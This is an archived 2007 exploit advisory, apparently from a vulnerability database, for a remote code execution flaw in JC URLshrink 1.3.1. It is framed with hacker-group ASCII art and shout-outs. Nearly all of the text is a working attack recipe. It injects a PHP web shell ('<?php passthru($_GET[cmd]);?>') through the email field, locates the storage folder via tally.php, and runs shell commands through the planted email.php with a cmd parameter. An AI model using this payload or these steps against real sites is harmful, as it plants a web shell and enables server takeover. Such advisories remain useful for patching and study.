Lucene search
SecurityvulnsSECURITYVULNS:DOC:16539HistoryApr 02, 2007 - 12:00 a.m.
JC URLshrink 1.3.1 Remote Code Execution Vulnerability
2007-04-0200:00:00
vulners.com
25
.-""""""""-.
/ Dj7xpl \
| |
|, .-. .-. ,|
| )(_o/ \o_)( |
|/ /\ \|
(@_ (_ ^^ _)
_ ) \_______\__|IIIIII|__/_______________________________
(_)@8@8{}<________|-\IIIIII/-|________________________________>
)_/ \ /
(@
+____Iranian Are The Best In World+
+
-
/*************************__I N F O__**************************\ -
|* *| -
|* U R L S H R I N K *| -
|* *| -
|* Portal: Urlshrink *| -
|* Version: 1.3.1 *| -
|* Release: 26-07-2006 *| -
|* www: www.developers.jccorp.net *| -
|* Author: Dj7xpl | [email protected] *| -
|* *| -
\**************************************************************/
+_______________________________________________________________________________________________________________________+
+______E X P L O I T+
+
+
-
E X P L O I T - - -
-------------- -
1) Insert Bad Code -
[X] Enter Your URL to shrink: (Enter Random Url) E.g : milw0m.com -
[X] Enter your Email Address: (Enter Bad Code) E.g : <?php passthru($_GET[cmd]);?> -
2) See Folder Name -
[X] http://[Target]/[Path]/data/tally.php -
[X] http://localhost/urlshrink/data/tally.php E.g : 5 -
3) Visit Your Code -
[X] http://localhost/urlshrink/[Folder Name]/email.php -
E.g : http://localhost/urlshrink/5/email.php?cmd=ls -la
+_______________________________________________________________________________________________________________________+
+____T N X+
+
+
-
Sp Tnx : Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org, Simorgh .............
+_______________________________________________________________________________________________________________________+